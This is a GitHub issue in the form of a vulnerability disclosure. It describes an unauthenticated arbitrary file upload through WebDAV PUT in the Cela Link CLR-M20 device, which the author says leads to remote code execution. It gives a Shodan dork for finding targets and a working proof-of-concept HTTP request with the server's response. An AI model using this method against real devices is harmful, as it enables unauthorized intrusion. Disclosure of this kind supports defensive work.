New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary File Upload Cela Link CLR-M20 #1

Open
safakaslan opened this Issue Aug 1, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@safakaslan
Owner

safakaslan commented Aug 1, 2018

Exploit Title: Arbitrary File Upload Cela Link CLR-M20

Date: 13-07-2018

Shodan Dork: CLR-M20

Exploit Author: Safak Aslan

Software Link: http://www.celalink.com

Version: 2.7.1.6

Authentication Required: No

Tested on: Windows

Vulnerability Description

Due to the Via WebDAV (Web Distributed Authoring and Versioning),
on the remote server, Cela Link CLR-M20 allows unauthorized users to upload any file
(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes remote code execution as well.

Due to the WebDAV, it is possible to upload the arbitrary file utilizing the PUT method.

Proof-of-Concept

Request

PUT /test.html HTTP/1.1
Host: targetIP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Content-Length: 26

the reflection of random numbers 1230123012

Response

HTTP/1.1 201 Created
Content-Length: 0
Date: Fri, 13 Jul 2018 14:38:54 GMT
Server: lighttpd/1.4.20

As a result, on the targetIP/test.html, "the reflection of random numbers 1230123012" is reflected on the page.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment